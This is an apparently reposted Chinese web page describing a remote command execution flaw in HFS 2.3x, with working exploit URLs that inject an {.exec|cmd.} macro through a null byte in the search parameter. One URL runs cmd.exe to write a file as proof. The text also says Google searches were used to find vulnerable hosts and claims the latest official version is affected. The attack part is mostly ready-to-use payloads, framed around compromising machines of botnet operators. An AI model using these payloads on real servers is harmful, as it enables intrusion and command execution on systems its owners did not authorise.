首页 > 代码库 > HFS 2.3x 远程命令执行(抓鸡黑客末日)
HFS 2.3x 远程命令执行(抓鸡黑客末日)
从某论坛看见的,转载部分:
这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。
http://localhost:80/?search==%00{.exec|cmd.}
http://localhost:80/search=%00{.exec|cmd.}
注:有些版本search前面是没有?的。
测试部分:
百度搜HFS默认就是2.3x版本,执行echo测试成功:
http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123.}
google hack了一下,发现一个抓鸡黑阔:
已测试官方最新版,一样存在。
HFS 2.3x 远程命令执行(抓鸡黑客末日)
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。